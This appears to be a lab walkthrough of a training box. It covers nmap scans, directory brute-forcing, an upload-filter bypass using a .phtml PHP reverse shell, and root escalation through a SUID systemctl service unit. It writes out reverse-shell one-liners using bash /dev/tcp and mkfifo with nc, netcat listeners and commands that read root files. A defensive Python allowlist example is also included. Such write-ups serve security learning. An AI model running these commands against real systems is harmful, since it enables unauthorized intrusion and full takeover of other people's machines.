[Task 1] Deploy the machine
[Task 2] Reconnaissance
Cheat sheet reference: https://www.stationx.net/nmap-cheat-sheet/
1–3. Scan the box:
nmap -sV <machine ip>
4. How many ports will nmap scan if the flag -p-400 was used?
5. Using the nmap flag -n what will it not resolve?
ANS: DNS
6. What is the most likely operating system this machine is running?
I’ll use this command once and for all
nmap -A -T5 <ip> -vv
7. What port is the web server running on?
ANS: It’s in #1
8. It's important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (each of which can be a point of exploitation) is very important. Don't forget that ports in a higher range might be open, so always scan ports above 1000 (even if you leave that scan running in the background).
Using nmap vuln script
nmap --script vuln <ip>
Scan high ports
nmap -T5 -p- -vv <ip>
Telnet to ftp
telnet <ip> <port no.>
SSH
ssh <ip>
Explore http site
Try to click every function/button, nothing so far
View source, nothing so far
Inspect sources and network. Now I know that this site is a JS application.
Conclusion
There are 5 TCP ports open on this server.
Port 3333 (httpd service) hosts a JS web app.
[Task 3] Locating directories using GoBuster
1. Let's first start off by scanning the website to find any hidden directories. To do this, we're going to use GoBuster.
gobuster dir -u http://<ip>:3333/ -w rockyou.txt
It's too slow, I will use dirbuster instead.
Access each directory, and I find something in “internal” and “internal/uploads”.
2. What is the directory that has an upload form page?
ANS: It’s in #1.
[Task 4] Compromise the webserver
1. Try uploading a few file types to the server. What common extension seems to be blocked?
I uploaded a php reverse shell, but it was not allowed.
2. To identify which extensions are not blocked, we’re going to fuzz the upload form.
Intercept traffic with Burp Suite
Right-click and send to Intruder
At payload options, create list
At position, clear all $ and add $ as highlighted
Start attack
I don’t see the difference, I’ll try it manually.
Upload “reverse_shell.phtml”
Success
Verify upload result in “/internal/uploads/”
At the attacker’s machine, type
nc -lvp 1234
Click at the uploaded file
Back to the attacker's machine, we have a shell.
3. We’re going to use Intruder (used for automating customised attacks).
Skipped, I already did this in #2.
4. Now we know what extension we can use for our payload we can progress.
ANS: It’s in #2.
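The upload check the writeup ran into is a denylist: “.php” is refused, yet “.phtml” (which the server still executes) goes through. As an added illustration (not the writeup's code, and not the box's real upload handler), here is that weak denylist next to an allowlist that only accepts what the form needs; the allowed extension set is an assumption.

```python
from pathlib import PurePosixPath

# Denylist modelled on the observed behaviour: only ".php" is refused,
# so "reverse_shell.phtml" is accepted even though httpd executes it.
BLOCKED_EXTENSIONS = {".php"}

# Allowlist for the hardened check. Assumed here: the form is meant for
# images and documents, so nothing the server would execute is listed.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}


def denylist_allows(filename: str) -> bool:
    """Weak check: anything not explicitly blocked gets through."""
    return PurePosixPath(filename).suffix.lower() not in BLOCKED_EXTENSIONS


def allowlist_allows(filename: str) -> bool:
    """Hardened check: bare file name, exactly one known extension."""
    # Refuse empty names and anything carrying path separators or NUL bytes,
    # so the file cannot land outside the upload directory.
    if not filename or any(c in filename for c in "/\\\0"):
        return False
    path = PurePosixPath(filename)
    # Require exactly one extension so the handler decision is unambiguous;
    # this also rejects dotfiles such as ".htaccess" (no suffix at all).
    if len(path.suffixes) != 1:
        return False
    return path.suffix.lower() in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    # Constructed sample names, including the one the writeup uploaded.
    for name in ("photo.png", "shell.php", "reverse_shell.phtml"):
        print(f"{name:20} denylist={denylist_allows(name)!s:5} "
              f"allowlist={allowlist_allows(name)}")
```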
5. What user was running the web server?
cat /etc/passwd
6. What is the user flag?
cd /home/bill
cat user.txt
[Task 5] Privilege Escalation
1. On the system, search for all SUID files. What file stands out?
Reference: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
find / -perm -u=s -type f 2>/dev/null
2. Become root and get the last flag (/root/root.txt)
Reference:
- https://gtfobins.github.io/gtfobins/systemctl/
- https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
Read “root.txt” through a linked systemd service (systemctl is SUID here):
eop=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop
/bin/systemctl link $eop
/bin/systemctl enable --now $eop
cd /tmp
ls
cat output
3. Finally, let's get root privileges
Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Try Bash
eop=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "bash -i >& /dev/tcp/<ip>/8080 0>&1"
[Install]
WantedBy=multi-user.target' > $eop
Back to attacker’s machine
nc -lvp 8080
Back to victim’s machine
/bin/systemctl link $eop
/bin/systemctl enable --now $eop
Doesn't work!!!
Try Netcat
eop=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 8080 >/tmp/f"
[Install]
WantedBy=multi-user.target' > $eop
Back to attacker’s machine
nc -lvp 8080
Back to victim’s machine
/bin/systemctl link $eop
/bin/systemctl enable --now $eop
Back to attacker's machine, it works
whoami